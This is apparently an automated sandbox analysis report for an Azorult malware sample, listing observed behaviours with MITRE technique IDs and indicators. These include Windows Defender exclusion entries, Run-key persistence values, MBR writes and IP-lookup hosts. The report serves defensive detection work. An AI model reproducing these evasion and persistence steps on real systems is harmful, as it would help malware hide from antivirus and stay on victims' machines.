azorult | 8f4d9fec8d65f36cc3379135373703612b13d644c2e92ef15e4100d77bef4f4d

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	F9D0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	F9D0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	F9D0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	F9D0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\F9D0.exe = "0"	F9D0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	F9D0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	F9D0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\BlackFrost = "0"	F9D0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	F9D0.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	F9D0.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	gcttt.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	2633692.28
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\e0628078-e601-4817-9fa0-8abd0342a450\\98A7.exe\" --AutoStart"	98A7.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\BlackFrost = "\"C:\\Windows\\rss\\csrss.exe\""	F9D0.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 21 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
68	ip-api.com
70	icanhazip.com
560	api.2ip.ua
343	ip-api.com
504	ipinfo.io
684	ipinfo.io
788	ipinfo.io
991	ipinfo.io
24	api.ipify.org
305	api.2ip.ua
314	api.2ip.ua
1155	ipinfo.io
1479	api.2ip.ua
752	ipinfo.io
848	api.2ip.ua
1306	ipinfo.io
304	api.2ip.ua
562	api.2ip.ua
576	api.2ip.ua
664	api.ipify.org
749	ipinfo.io

Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs

Bootkits write to the MBR to gain persistence at a level below the operating system.

bootkit persistence

Bootkit

T1067

description	ioc	Process
File opened for modification	\??\PhysicalDrive0	Setup.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	C0CA61A12E4C8B38.exe
File opened for modification	\??\PhysicalDrive0	MiniThunderPlatform.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
1996	Setup.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 1984 set thread context of 2032	1984	3ECF.tmp.exe	44
PID 940 set thread context of 1840	940	C0CA61A12E4C8B38.exe	61
PID 940 set thread context of 1512	940	C0CA61A12E4C8B38.exe	75
PID 940 set thread context of 2024	940	C0CA61A12E4C8B38.exe	82
PID 1912 set thread context of 2920	1912	C0E3.exe	167
PID 3012 set thread context of 2940	3012	nvkobzii.exe	144
PID 2576 set thread context of 1096	2576	bcdedit.exe	149
PID 2940 set thread context of 2264	2940	svchost.exe	178

Drops file in Program Files directory 37 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\DTS\unins000.dat	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File created	C:\Program Files (x86)\DTS\unins000.dat	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-KUN6U.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\lang\is-K1J6Q.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-BMRSM.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-JAF2G.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-MKNR0.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-ONIQ3.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-TBKTJ.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\lang\is-QUSOU.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-NMA34.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-U9F93.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\Seed Trade\Seed\seed.exe	seed.sfx.exe
File created	C:\Program Files (x86)\DTS\images\is-O6155.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\DTS\seed.sfx.exe	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-PLQCC.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-DKJ60.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-P4C66.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-AU9CH.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-0FKQA.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-C5S61.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-AP4LK.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-6Q3PL.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade\Seed	seed.sfx.exe
File created	C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259705690	seed.sfx.exe
File opened for modification	C:\Program Files (x86)\DTS\DreamTrip.exe	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-EHG1I.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-LH4PL.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-KB8S7.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-I0V1K.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-P0QNR.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-OTSTF.tmp	23E04C4F32EF2158.tmp
File opened for modification	C:\Program Files (x86)\Seed Trade	seed.sfx.exe
File created	C:\Program Files (x86)\DTS\is-2SOFC.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\is-GNM5I.tmp	23E04C4F32EF2158.tmp
File created	C:\Program Files (x86)\DTS\images\is-E1TLG.tmp	23E04C4F32EF2158.tmp

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	F9D0.exe
File created	C:\Windows\rss\csrss.exe	F9D0.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new	multitimer.exe
File created	C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new	multitimer.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3088	2784	WerFault.exe	240

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	conhost.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	conhost.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	conhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bcdedit.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bcdedit.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	bcdedit.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Sui.com
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Sui.com
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3ECF.tmp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3ECF.tmp.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
2224	schtasks.exe
3012	schtasks.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
1600	timeout.exe
2404	timeout.exe
2848	timeout.exe
988	timeout.exe
1312	timeout.exe
1620	timeout.exe
3736	timeout.exe

GoLang User-Agent 9 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	1330	Go-http-client/1.1
HTTP User-Agent header	1331	Go-http-client/1.1
HTTP User-Agent header	1464	Go-http-client/1.1
HTTP User-Agent header	1466	Go-http-client/1.1
HTTP User-Agent header	1324	Go-http-client/1.1
HTTP User-Agent header	1328	Go-http-client/1.1
HTTP User-Agent header	1458	Go-http-client/1.1
HTTP User-Agent header	1467	Go-http-client/1.1
HTTP User-Agent header	1506	Go-http-client/1.1

Kills process with taskkill 6 IoCs

evasion

pid	Process
1908	taskkill.exe
2020	taskkill.exe
2148	taskkill.exe
2608	taskkill.exe
1716	taskkill.exe
528	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "321655880"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fe3536ef3d41ba49b6520b4f5d7611b40000000002000000000010660000000100002000000094ab4e29eadc7992bcbf8ecdff92fb9bbc0e7fd5cfa344a1d29c0df34e386f97000000000e8000000002000020000000bdc571def21b8927c8f4a5618664174e0813f7462827ddc4adc02c9cf16524ff2000000014db4b1abe733db0eb19c07120e53ab7e31fbf4e2d9db1567f3041e4ef79228240000000ef4cb305a7c5eb2abd2ed6f405c4855c42c7b438dbf488dbceca06e11f1e41374cf405fbf11bfa916e77850b5bacdda2976733afe3fdb83d7c46fdb00aaa2484	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0f816cc3711d701	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{F72ACF81-7D2A-11EB-8C5A-D243B09151DE} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000fe3536ef3d41ba49b6520b4f5d7611b400000000020000000000106600000001000020000000a3afcc30906cc488252e1fdbc523d9fcf112813a2b5fe2599efd730e807f55a4000000000e800000000200002000000011a07722746293b39a8de3184ffcc6d31c2e8df5a263ec4bcea0b28e73d8f7769000000022bac4e7203c83051006664cec3d69bac0cef2f0ec746dabf57a629abf8f71cbaed56514f3ca2b9be4d2cef8edaea8b3a2f563272811a1c34c59249afc36633b8eb4ecd87f63b8253b82c92beb8806ffe3d78c90250fc5a91ea966775a00f2c228a21103ec29c470734183d8780f1fe3a1122881dc4648e3ca07912c904bcb7de0a81b084472e19dc4a3b3b7dfecf540400000003f66745ee4079035c673089249986ac762578c6ebd772848c9664f5134fc5ee59f43fe6d9c7ba1ec28923e7cdf5b73a9b471e85cfbe6b17aeedb7abd85d92d95	iexplore.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{C88B0D75-95D7-40B2-89BD-4A3AD4DC11FD}	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-961 = "Paraguay Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	file.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time"	F9D0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time"	F9D0.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	file.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	file.exe
